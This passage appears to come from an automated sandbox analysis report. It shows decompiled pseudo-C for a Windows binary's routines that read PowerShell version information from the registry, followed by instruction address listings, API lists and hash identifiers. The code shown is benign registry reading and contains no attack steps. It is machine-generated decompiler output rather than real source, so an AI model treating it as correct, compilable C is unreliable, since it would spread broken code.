					if(_t172 == 0) {
						goto L54;
					}
					_t79 = _a16;
					if(_t79 == 0) {
						goto L54;
					}
					_push(_t163);
					 *_t79 = 0xffffffff;
					_t164 =  *_t172;
					_t81 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\PowerShell", 0, 0x20019,  &_v36); // executed
					_t138 = _t81;
					if(_t138 != 0) {
						__eflags = _t138 - 2;
						if(_t138 != 2) {
							_t165 =  *0x12606d4; // 0x0
							_t172 =  *( *_t165 + 8);
							 *0x1261204(_t138, 0x14, L"SOFTWARE\\Microsoft\\PowerShell");
							 *( *( *_t165 + 8))();
						} else {
							_t85 =  *0x12606d4; // 0x0
							_t172 =  *( *_t85 + 4);
							__eflags = _t164;
							if(_t164 != 0) {
								 *0x1261204(_t85, 0, 0x27, L"SOFTWARE\\Microsoft\\PowerShell", _t164);
								 *_t172();
							} else {
								 *0x1261204(_t85, _t164, 0x1e, L"SOFTWARE\\Microsoft\\PowerShell");
								 *_t172();
							}
						}
						_t77 = 0;
						L51:
						_pop(_t163);
						L52:
						return E01259A40(_t77, _t134, _v8 ^ _t177, _t159, _t163, _t172);
					}
					_push(_t134);
					_t135 = E0125972E(0x200);
					_t181 = _t178 + 4;
					if(_t135 == 0) {
						L53:
						_v9 = 0;
						L46:
						_t91 = _v36;
						if(_t91 != 0) {
							RegCloseKey(_t91); // executed
						}
						if(_t135 != 0) {
							free(_t135);
						}
						_t77 = _v9;
						_pop(_t134);
						goto L51;
					}
					_t166 = 0;
					_v24 = 0;
					_v32 = 0x100;
					_t95 = RegEnumKeyExW(_v36, 0, _t135,  &_v32, 0, 0, 0,  &_v52); // executed
					_t142 = _t95;
					_v40 = 1;
					if(_t142 == 0x103) {
						L80:
						_t96 =  *0x12606d4; // 0x0
						_t172 =  *( *_t96 + 4);
						 *0x1261204(_t96, 0, 0x1d);
						 *( *( *_t96 + 4))();
						_t181 = _t181 + 0xc;
						goto L53;
					}
					while(_t142 == 0) {
						_v28 = 0;
						_v44 = 0;
						if(E01259200(_t135) != 0) {
							L42:
							_v32 = 0x100;
							_t106 = RegEnumKeyExW(_v36, _v40, _t135,  &_v32, 0, 0, 0,  &_v52); // executed
							_v40 = _v40 + 1;
							_t142 = _t106;
							if(_t142 != 0x103) {
								continue;
							}
							if(_t166 == 0) {
								goto L80;
							}
							_t172 = _a12;
							 *_t172 = _t166;
							_t168 = _a8;
							 *_a16 = _v24;
							_t109 = E012590D0(0x12606d0, L"SOFTWARE\\Microsoft\\PowerShell\\%1!ls!\\PowerShellEngine", _t168,  &_v16, 0x17, _t166);
							_t181 = _t181 + 0x18;
							if(_t109 == 0) {
								goto L53;
							}
							_t169 =  *_t168;
							_t172 =  *_t172;
							_v16 = _t172;
							_v24 = _t169;
							_v9 = 1;
							_t110 = RegOpenKeyExW(0x80000002, _t169, 0, 0x20019, _a4); // executed
							_t142 = _t110;
							if(_t142 != 0) {
								__eflags = _t142 - 2;
								if(_t142 != 2) {
									_push(_v24);
									_push(0x14);
									L79:
									_t167 =  *0x12606d4; // 0x0
									_t172 =  *( *_t167 + 8);
									 *0x1261204(_t142);
									 *( *( *_t167 + 8))();
									goto L53;
								}
								_t111 =  *0x12606d4; // 0x0
								__eflags = _t172;
								_t172 =  *( *_t111 + 4);
								if(__eflags != 0) {
									 *0x1261204(_t111, 0, 0x27, _t169, _v16);
									 *_t172();
									_t181 = _t181 + 0x14;
								} else {
									 *0x1261204(_t111, 0, 0x1e, _t169);
									 *_t172();
									_t181 = _t181 + 0x10;
								}
								goto L53;
							}
							goto L46;
						}
						_v20 = 0;
						if(E01259200(_t135) != 0) {
							goto L42;
						}
						_v16 = wcschr(_t135, 0x2e);
						_t175 = wcschr(_t135, 0);
						_t181 = _t181 + 0x10;
						if(_t175 == 0) {
							goto L42;
						}
						_t119 = _v16;
						if(_v16 != 0) {
							_t159 = E0125B9B5( &_v44, _t135, _t119,  &_v44);
							__eflags = _t159;
							if(_t159 == 0) {
								goto L42;
							}
							_t121 = _v44;
							_t151 =  &(_v16[0]);
							L23:
							if(_t159 == 0 || _t151 != 0 || _t121 <= _v24) {
								goto L42;
							} else {
								_t172 = _v32 + 1;
								_v24 = _t121;
								_t207 = _t166;
								if(_t166 != 0) {
									free(_t166);
									_t181 = _t181 + 4;
								}
								_t159 = _t172 * 2 >> 0x20;
								_t166 = E0125972E( ~(0 | _t207 > 0x00000000) | _t172 * 0x00000002);
								_t181 = _t181 + 4;
								_v16 = _t166;
								if(_t166 == 0) {
									goto L53;
								} else {
									_t125 = 0;
									if(_t172 == 0 || _t172 > 0x7fffffff) {
										_t125 = 0x80070057;
									}
									if(_t125 < 0) {
										__eflags = _t172;
										if(_t172 != 0) {
											 *_t166 = 0;
										}
										goto L41;
									} else {
										_v20 = 0;
										_t157 = _t166;
										if(_t172 == 0) {
											L70:
											_t157 = _t157 - 2;
											_t125 = 0x8007007a;
											L40:
											_t166 = _v16;
											_t159 = 0;
											 *_t157 = 0;
											L41:
											if(_t125 < 0) {
												goto L53;
											}
											goto L42;
										}
										_t162 = 0x7ffffffe - _t172;
										_t171 = _t135 - _v16;
										while(_t162 + _t172 != 0) {
											_t127 =  *(_t171 + _t157) & 0x0000ffff;
											if(_t127 == 0) {
												break;
											}
											 *_t157 = _t127;
											_t157 = _t157 + 2;
											_t172 = _t172 - 1;
											if(_t172 != 0) {
												continue;
											}
											goto L70;
										}
										__eflags = _t172;
										if(_t172 == 0) {
											goto L70;
										}
										_t125 = _v20;
										goto L40;
									}
								}
							}
						}
						_t128 =  *_t175 & 0x0000ffff;
						_t158 = _t135;
						_v9 = 1;
						if(_t128 >= 0x30) {
							__eflags = _t128 - 0x39;
							if(_t128 > 0x39) {
								goto L13;
							}
							L64:
							_t121 = _v28;
							_t159 = 0;
							_t151 = _v20;
							goto L23;
						}
						L13:
						if(0 ==  *_t135 || _t135 >= _t175) {
							_t121 = _v28;
							_t159 = 0;
							goto L21;
						} else {
							while( *_t158 == 0x30) {
								_t158 =  &(_t158[0]);
								__eflags = _t158 - _t175;
								if(_t158 < _t175) {
									continue;
								}
								break;
							}
							if((_t175 - _t158 & 0xfffffffe) > 0x14) {
								_t121 = _v28;
								_t159 = 0;
								_t151 = _v20;
								goto L23;
							}
							_v16 = 0;
							_t121 = wcstoul(_t158,  &_v16, 0xa);
							_t181 = _t181 + 0xc;
							if(_t175 != _v16 || _t121 > 0x7fffffff) {
								goto L64;
							} else {
								_t159 = _v9;
								L21:
								if(_t159 == 0) {
									goto L42;
								}
								_t151 = 0;
								goto L23;
							}
						}
					}
					_push(L"SOFTWARE\\Microsoft\\PowerShell");
					_push(0x13);
					goto L79;
				}
			}






















































                                                                                                                                                                                                                              0x01258d98
                                                                                                                                                                                                                              0x01258d9f
                                                                                                                                                                                                                              0x01258da7
                                                                                                                                                                                                                              0x01258dae
                                                                                                                                                                                                                              0x012590cb
                                                                                                                                                                                                                              0x012590cb
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258dbe
                                                                                                                                                                                                                              0x01258dbe
                                                                                                                                                                                                                              0x01258dc3
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258dc9
                                                                                                                                                                                                                              0x01258dce
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258dd4
                                                                                                                                                                                                                              0x01258dd5
                                                                                                                                                                                                                              0x01258dde
                                                                                                                                                                                                                              0x01258df2
                                                                                                                                                                                                                              0x01258df8
                                                                                                                                                                                                                              0x01258dfc
                                                                                                                                                                                                                              0x0125b1f5
                                                                                                                                                                                                                              0x0125b1f8
                                                                                                                                                                                                                              0x0125b238
                                                                                                                                                                                                                              0x0125b248
                                                                                                                                                                                                                              0x0125b24d
                                                                                                                                                                                                                              0x0125b255
                                                                                                                                                                                                                              0x0125b1fa
                                                                                                                                                                                                                              0x0125b1fa
                                                                                                                                                                                                                              0x0125b201
                                                                                                                                                                                                                              0x0125b206
                                                                                                                                                                                                                              0x0125b208
                                                                                                                                                                                                                              0x0125b22b
                                                                                                                                                                                                                              0x0125b231
                                                                                                                                                                                                                              0x0125b20a
                                                                                                                                                                                                                              0x0125b213
                                                                                                                                                                                                                              0x0125b219
                                                                                                                                                                                                                              0x0125b21b
                                                                                                                                                                                                                              0x0125b208
                                                                                                                                                                                                                              0x0125b257
                                                                                                                                                                                                                              0x012590b3
                                                                                                                                                                                                                              0x012590b3
                                                                                                                                                                                                                              0x012590b4
                                                                                                                                                                                                                              0x012590c2
                                                                                                                                                                                                                              0x012590c2
                                                                                                                                                                                                                              0x01258e02
                                                                                                                                                                                                                              0x01258e0d
                                                                                                                                                                                                                              0x01258e0f
                                                                                                                                                                                                                              0x01258e14
                                                                                                                                                                                                                              0x012590c5
                                                                                                                                                                                                                              0x012590c5
                                                                                                                                                                                                                              0x01259094
                                                                                                                                                                                                                              0x01259094
                                                                                                                                                                                                                              0x01259099
                                                                                                                                                                                                                              0x0125909c
                                                                                                                                                                                                                              0x0125909c
                                                                                                                                                                                                                              0x012590a4
                                                                                                                                                                                                                              0x012590a7
                                                                                                                                                                                                                              0x012590ac
                                                                                                                                                                                                                              0x012590af
                                                                                                                                                                                                                              0x012590b2
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012590b2
                                                                                                                                                                                                                              0x01258e1a
                                                                                                                                                                                                                              0x01258e1c
                                                                                                                                                                                                                              0x01258e26
                                                                                                                                                                                                                              0x01258e3a
                                                                                                                                                                                                                              0x01258e40
                                                                                                                                                                                                                              0x01258e42
                                                                                                                                                                                                                              0x01258e4f
                                                                                                                                                                                                                              0x0125b356
                                                                                                                                                                                                                              0x0125b356
                                                                                                                                                                                                                              0x0125b362
                                                                                                                                                                                                                              0x0125b367
                                                                                                                                                                                                                              0x0125b36d
                                                                                                                                                                                                                              0x0125b36f
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b36f
                                                                                                                                                                                                                              0x01258e55
                                                                                                                                                                                                                              0x01258e60
                                                                                                                                                                                                                              0x01258e63
                                                                                                                                                                                                                              0x01258e6d
                                                                                                                                                                                                                              0x01258ffd
                                                                                                                                                                                                                              0x01259000
                                                                                                                                                                                                                              0x01259019
                                                                                                                                                                                                                              0x0125901f
                                                                                                                                                                                                                              0x01259022
                                                                                                                                                                                                                              0x0125902a
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01259032
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01259038
                                                                                                                                                                                                                              0x01259042
                                                                                                                                                                                                                              0x01259044
                                                                                                                                                                                                                              0x01259049
                                                                                                                                                                                                                              0x0125905a
                                                                                                                                                                                                                              0x0125905f
                                                                                                                                                                                                                              0x01259064
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01259069
                                                                                                                                                                                                                              0x0125906b
                                                                                                                                                                                                                              0x0125907a
                                                                                                                                                                                                                              0x0125907d
                                                                                                                                                                                                                              0x01259080
                                                                                                                                                                                                                              0x01259084
                                                                                                                                                                                                                              0x0125908a
                                                                                                                                                                                                                              0x0125908e
                                                                                                                                                                                                                              0x0125b2e7
                                                                                                                                                                                                                              0x0125b2ea
                                                                                                                                                                                                                              0x0125b32b
                                                                                                                                                                                                                              0x0125b32e
                                                                                                                                                                                                                              0x0125b339
                                                                                                                                                                                                                              0x0125b339
                                                                                                                                                                                                                              0x0125b342
                                                                                                                                                                                                                              0x0125b347
                                                                                                                                                                                                                              0x0125b34f
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b34f
                                                                                                                                                                                                                              0x0125b2ec
                                                                                                                                                                                                                              0x0125b2f1
                                                                                                                                                                                                                              0x0125b2f5
                                                                                                                                                                                                                              0x0125b2fa
                                                                                                                                                                                                                              0x0125b31b
                                                                                                                                                                                                                              0x0125b321
                                                                                                                                                                                                                              0x0125b323
                                                                                                                                                                                                                              0x0125b2fc
                                                                                                                                                                                                                              0x0125b302
                                                                                                                                                                                                                              0x0125b308
                                                                                                                                                                                                                              0x0125b30a
                                                                                                                                                                                                                              0x0125b30a
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b2fa
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125908e
                                                                                                                                                                                                                              0x01258e74
                                                                                                                                                                                                                              0x01258e82
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258e94
                                                                                                                                                                                                                              0x01258e9d
                                                                                                                                                                                                                              0x01258e9f
                                                                                                                                                                                                                              0x01258ea4
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258eaa
                                                                                                                                                                                                                              0x01258eaf
                                                                                                                                                                                                                              0x0125b269
                                                                                                                                                                                                                              0x0125b26b
                                                                                                                                                                                                                              0x0125b26d
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b276
                                                                                                                                                                                                                              0x0125b279
                                                                                                                                                                                                                              0x01258f32
                                                                                                                                                                                                                              0x01258f34
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258f4b
                                                                                                                                                                                                                              0x01258f4e
                                                                                                                                                                                                                              0x01258f4f
                                                                                                                                                                                                                              0x01258f52
                                                                                                                                                                                                                              0x01258f54
                                                                                                                                                                                                                              0x01258f57
                                                                                                                                                                                                                              0x01258f5c
                                                                                                                                                                                                                              0x01258f5c
                                                                                                                                                                                                                              0x01258f68
                                                                                                                                                                                                                              0x01258f77
                                                                                                                                                                                                                              0x01258f79
                                                                                                                                                                                                                              0x01258f7c
                                                                                                                                                                                                                              0x01258f81
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258f87
                                                                                                                                                                                                                              0x01258f87
                                                                                                                                                                                                                              0x01258f8b
                                                                                                                                                                                                                              0x0125b2be
                                                                                                                                                                                                                              0x0125b2be
                                                                                                                                                                                                                              0x01258f9f
                                                                                                                                                                                                                              0x0125b2d5
                                                                                                                                                                                                                              0x0125b2d7
                                                                                                                                                                                                                              0x0125b2df
                                                                                                                                                                                                                              0x0125b2df
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258fa5
                                                                                                                                                                                                                              0x01258fa5
                                                                                                                                                                                                                              0x01258fac
                                                                                                                                                                                                                              0x01258fb0
                                                                                                                                                                                                                              0x0125b2c8
                                                                                                                                                                                                                              0x0125b2c8
                                                                                                                                                                                                                              0x0125b2cb
                                                                                                                                                                                                                              0x01258fed
                                                                                                                                                                                                                              0x01258fed
                                                                                                                                                                                                                              0x01258ff0
                                                                                                                                                                                                                              0x01258ff2
                                                                                                                                                                                                                              0x01258ff5
                                                                                                                                                                                                                              0x01258ff7
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258ff7
                                                                                                                                                                                                                              0x01258fbd
                                                                                                                                                                                                                              0x01258fbf
                                                                                                                                                                                                                              0x01258fc2
                                                                                                                                                                                                                              0x01258fc9
                                                                                                                                                                                                                              0x01258fd0
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258fd2
                                                                                                                                                                                                                              0x01258fd5
                                                                                                                                                                                                                              0x01258fd8
                                                                                                                                                                                                                              0x01258fdb
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258fdd
                                                                                                                                                                                                                              0x01258fe2
                                                                                                                                                                                                                              0x01258fe4
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258fea
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258fea
                                                                                                                                                                                                                              0x01258f9f
                                                                                                                                                                                                                              0x01258f81
                                                                                                                                                                                                                              0x01258f34
                                                                                                                                                                                                                              0x01258eb5
                                                                                                                                                                                                                              0x01258eb8
                                                                                                                                                                                                                              0x01258eba
                                                                                                                                                                                                                              0x01258ec1
                                                                                                                                                                                                                              0x0125b281
                                                                                                                                                                                                                              0x0125b284
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b28a
                                                                                                                                                                                                                              0x0125b28a
                                                                                                                                                                                                                              0x0125b28d
                                                                                                                                                                                                                              0x0125b28f
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b28f
                                                                                                                                                                                                                              0x01258ec7
                                                                                                                                                                                                                              0x01258ecc
                                                                                                                                                                                                                              0x0125b2b4
                                                                                                                                                                                                                              0x0125b2b7
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258ee0
                                                                                                                                                                                                                              0x01258ee0
                                                                                                                                                                                                                              0x0125b297
                                                                                                                                                                                                                              0x0125b29a
                                                                                                                                                                                                                              0x0125b29c
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b2a2
                                                                                                                                                                                                                              0x01258ef4
                                                                                                                                                                                                                              0x0125b2a7
                                                                                                                                                                                                                              0x0125b2aa
                                                                                                                                                                                                                              0x0125b2ac
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b2ac
                                                                                                                                                                                                                              0x01258eff
                                                                                                                                                                                                                              0x01258f08
                                                                                                                                                                                                                              0x01258f0e
                                                                                                                                                                                                                              0x01258f14
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258f25
                                                                                                                                                                                                                              0x01258f25
                                                                                                                                                                                                                              0x01258f28
                                                                                                                                                                                                                              0x01258f2a
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258f30
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258f30
                                                                                                                                                                                                                              0x01258f14
                                                                                                                                                                                                                              0x01258ecc
                                                                                                                                                                                                                              0x0125b332
                                                                                                                                                                                                                              0x0125b337
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b337

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\PowerShell,00000000,00020019,00000000,00000000,00000000), ref: 01258DF2
                                                                                                                                                                                                                                • Part of subcall function 0125972E: malloc.MSVCRT ref: 01259748
                                                                                                                                                                                                                              • RegEnumKeyExW.KERNELBASE(00000000,00000000,00000000,00000100,00000000,00000000,00000000,?,00000000), ref: 01258E3A
                                                                                                                                                                                                                              • wcschr.MSVCRT ref: 01258E8B
                                                                                                                                                                                                                              • wcschr.MSVCRT ref: 01258E97
                                                                                                                                                                                                                              • wcstoul.MSVCRT ref: 01258F08
                                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 01258F57
                                                                                                                                                                                                                              • RegEnumKeyExW.KERNELBASE(00000000,00000001,00000000,00000100,00000000,00000000,00000000,?,00000000), ref: 01259019
                                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020019,00000000), ref: 01259084
                                                                                                                                                                                                                              • RegCloseKey.KERNELBASE(00000000,00000000), ref: 0125909C
                                                                                                                                                                                                                              • free.MSVCRT(00000000,00000000), ref: 012590A7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EnumOpenfreewcschr$Closemallocwcstoul
                                                                                                                                                                                                                              • String ID: SOFTWARE\Microsoft\PowerShell$SOFTWARE\Microsoft\PowerShell\%1!ls!\PowerShellEngine
                                                                                                                                                                                                                              • API String ID: 2290616977-1295826426
                                                                                                                                                                                                                              • Opcode ID: bbc1d0bcfe742b4483e272ec2399e0d1d53053df52eedfc02c18d0a3d3591cb2
                                                                                                                                                                                                                              • Instruction ID: 1329a6ad33a68c2a8d55456feea73daee0535a64864158e8c60d78901ea042bf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bbc1d0bcfe742b4483e272ec2399e0d1d53053df52eedfc02c18d0a3d3591cb2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1C1E775A20206ABDF609F69DCC9BBEBBB5AF48744F144019EE11F72D0D7B19800CBA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 01258C90, Relevance: 16.7, APIs: 11, Instructions: 235registrywindowCOMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 73%
                                                                                                                                                                                                                              			E01258C90(void* __ebx, void* _a4, short* _a8, intOrPtr _a12, void** _a16) {
				signed int _v8;
				char _v9;
				short _v16;
				short _v20;
				int* _v24;
				int _v28;
				signed int _v32;
				int _v36;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t73;
				intOrPtr _t75;
				long _t80;
				void* _t81;
				signed int _t82;
				intOrPtr* _t86;
				void* _t89;
				void* _t90;
				intOrPtr* _t91;
				long _t99;
				void* _t100;
				signed int _t101;
				intOrPtr* _t105;
				void* _t108;
				void* _t109;
				short* _t111;
				unsigned int _t112;
				short* _t113;
				signed int _t114;
				void* _t140;
				void* _t142;
				void* _t147;
				void* _t150;
				signed int _t151;
				void* _t152;
				void* _t153;

				_t110 = __ebx;
				_t73 =  *0x1260358; // 0xc21f7063
				_v8 = _t73 ^ _t151;
				_t140 = _a4;
				_t150 = 0;
				_v36 = 0;
				_v28 = 0;
				_v9 = 1;
				if(_t140 == 0 || E01259200(_a12) != 0 || _a16 == 0) {
					_t75 = 0;
					L11:
					 *_a16 = _t150;
					return E01259A40(_t75, _t110, _v8 ^ _t151, _t136, _a16, _t150);
				} else {
					_push(__ebx);
					_t111 = _a8;
					_t80 = RegQueryValueExW(_t140, _t111, 0,  &_v36, 0,  &_v28); // executed
					if(_t80 != 0) {
						_v16 = 0;
						_t81 = FormatMessageW(0x1100, 0, _t80, 0,  &_v16, 0, 0);
						_v24 = _t81;
						__eflags = _t81;
						if(_t81 == 0) {
							L13:
							_t75 = 0;
							L10:
							_pop(_t110);
							goto L11;
						} else {
							_t82 = _t81 + 1;
							_v32 = _t82;
							_t136 = _t82 * 2 >> 0x20;
							_t142 = E0125972E( ~(0 | __eflags > 0x00000000) | _t82 * 0x00000002);
							_t153 = _t152 + 4;
							_v20 = _t142;
							__eflags = _t142;
							if(_t142 != 0) {
								_t136 = _v32;
								_t90 = E0125CE50(_t142, _v32, _v16);
								__eflags = _t90;
								if(_t90 < 0) {
									_v24 = 0;
									free(_t142);
									_t153 = _t153 + 4;
									_v20 = 0;
								}
							}
							LocalFree(_v16);
							__eflags = _v24 - _t150;
							if(_v24 > _t150) {
								_t86 =  *0x12606d4; // 0x0
								 *0x1261204(_t86, 0, 0x16, _a12, _t111, _v20);
								 *((intOrPtr*)( *((intOrPtr*)( *_t86 + 4))))();
								_t89 = _v20;
								__eflags = _t89;
								if(_t89 != 0) {
									free(_t89);
								}
							}
							goto L13;
						}
					}
					if(_v36 != 1) {
						_push(_t111);
						_push(_a12);
						_push(0x18);
						L32:
						_t91 =  *0x12606d4; // 0x0
						 *0x1261204(_t91, 0);
						 *((intOrPtr*)( *((intOrPtr*)( *_t91 + 4))))();
						goto L13;
					}
					_t112 = _v28;
					_t163 = _t112;
					if(_t112 == 0) {
						_t113 = _a8;
						L31:
						_push(_t113);
						_push(_a12);
						_push(0xe);
						goto L32;
					}
					_t114 = _t112 >> 1;
					_t13 = _t114 + 1; // 0x1
					_t136 = _t13 * 2 >> 0x20;
					_t150 = E0125972E( ~(0 | _t163 > 0x00000000) | _t13 * 0x00000002);
					_t152 = _t152 + 4;
					if(_t150 == 0) {
						goto L13;
					}
					 *((short*)(_t150 + _t114 * 2)) = 0;
					_t113 = _a8;
					_t99 = RegQueryValueExW(_t140, _t113, 0, 0, _t150,  &_v28); // executed
					if(_t99 != 0) {
						_v20 = 0;
						_t100 = FormatMessageW(0x1100, 0, _t99, 0,  &_v20, 0, 0);
						_v24 = _t100;
						__eflags = _t100;
						if(_t100 != 0) {
							_t101 = _t100 + 1;
							_v32 = _t101;
							_t136 = _t101 * 2 >> 0x20;
							_t147 = E0125972E( ~(0 | __eflags > 0x00000000) | _t101 * 0x00000002);
							_t152 = _t152 + 4;
							_v16 = _t147;
							__eflags = _t147;
							if(_t147 != 0) {
								_t136 = _v32;
								_t109 = E0125CE50(_t147, _v32, _v20);
								__eflags = _t109;
								if(_t109 < 0) {
									_v24 = 0;
									free(_t147);
									_t152 = _t152 + 4;
									_v16 = 0;
								}
							}
							LocalFree(_v20);
							__eflags = _v24;
							if(_v24 > 0) {
								_t105 =  *0x12606d4; // 0x0
								 *0x1261204(_t105, 0, 0x16, _a12, _t113, _v16);
								 *((intOrPtr*)( *((intOrPtr*)( *_t105 + 4))))();
								_t108 = _v16;
								_t152 = _t152 + 0x18;
								__eflags = _t108;
								if(_t108 != 0) {
									free(_t108);
									_t152 = _t152 + 4;
								}
							}
						}
						free(_t150);
						_t150 = 0;
						_t75 = 0;
						goto L10;
					}
					if(_t99 ==  *_t150) {
						goto L31;
					} else {
						_t75 = _v9;
						goto L10;
					}
				}
			}








































                                                                                                                                                                                                                              0x01258c90
                                                                                                                                                                                                                              0x01258c98
                                                                                                                                                                                                                              0x01258c9f
                                                                                                                                                                                                                              0x01258ca4
                                                                                                                                                                                                                              0x01258ca7
                                                                                                                                                                                                                              0x01258ca9
                                                                                                                                                                                                                              0x01258cb0
                                                                                                                                                                                                                              0x01258cb7
                                                                                                                                                                                                                              0x01258cbd
                                                                                                                                                                                                                              0x01258d81
                                                                                                                                                                                                                              0x01258d5e
                                                                                                                                                                                                                              0x01258d66
                                                                                                                                                                                                                              0x01258d72
                                                                                                                                                                                                                              0x01258cdc
                                                                                                                                                                                                                              0x01258cdc
                                                                                                                                                                                                                              0x01258cdd
                                                                                                                                                                                                                              0x01258cec
                                                                                                                                                                                                                              0x01258cf4
                                                                                                                                                                                                                              0x0125b046
                                                                                                                                                                                                                              0x0125b054
                                                                                                                                                                                                                              0x0125b05a
                                                                                                                                                                                                                              0x0125b05d
                                                                                                                                                                                                                              0x0125b05f
                                                                                                                                                                                                                              0x01258d7d
                                                                                                                                                                                                                              0x01258d7d
                                                                                                                                                                                                                              0x01258d5d
                                                                                                                                                                                                                              0x01258d5d
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b065
                                                                                                                                                                                                                              0x0125b065
                                                                                                                                                                                                                              0x0125b068
                                                                                                                                                                                                                              0x0125b070
                                                                                                                                                                                                                              0x0125b07f
                                                                                                                                                                                                                              0x0125b081
                                                                                                                                                                                                                              0x0125b084
                                                                                                                                                                                                                              0x0125b087
                                                                                                                                                                                                                              0x0125b089
                                                                                                                                                                                                                              0x0125b08e
                                                                                                                                                                                                                              0x0125b093
                                                                                                                                                                                                                              0x0125b098
                                                                                                                                                                                                                              0x0125b09a
                                                                                                                                                                                                                              0x0125b09d
                                                                                                                                                                                                                              0x0125b0a0
                                                                                                                                                                                                                              0x0125b0a5
                                                                                                                                                                                                                              0x0125b0a8
                                                                                                                                                                                                                              0x0125b0a8
                                                                                                                                                                                                                              0x0125b09a
                                                                                                                                                                                                                              0x0125b0ae
                                                                                                                                                                                                                              0x0125b0b4
                                                                                                                                                                                                                              0x0125b0b7
                                                                                                                                                                                                                              0x0125b0c0
                                                                                                                                                                                                                              0x0125b0d5
                                                                                                                                                                                                                              0x0125b0db
                                                                                                                                                                                                                              0x0125b0dd
                                                                                                                                                                                                                              0x0125b0e3
                                                                                                                                                                                                                              0x0125b0e5
                                                                                                                                                                                                                              0x0125b0ec
                                                                                                                                                                                                                              0x0125b0f1
                                                                                                                                                                                                                              0x0125b0e5
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b0b7
                                                                                                                                                                                                                              0x0125b05f
                                                                                                                                                                                                                              0x01258cfe
                                                                                                                                                                                                                              0x0125b0f9
                                                                                                                                                                                                                              0x0125b0fa
                                                                                                                                                                                                                              0x0125b0fd
                                                                                                                                                                                                                              0x0125b1d6
                                                                                                                                                                                                                              0x0125b1d6
                                                                                                                                                                                                                              0x0125b1e5
                                                                                                                                                                                                                              0x0125b1eb
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b1ed
                                                                                                                                                                                                                              0x01258d04
                                                                                                                                                                                                                              0x01258d07
                                                                                                                                                                                                                              0x01258d09
                                                                                                                                                                                                                              0x01258d75
                                                                                                                                                                                                                              0x0125b1d0
                                                                                                                                                                                                                              0x0125b1d0
                                                                                                                                                                                                                              0x0125b1d1
                                                                                                                                                                                                                              0x0125b1d4
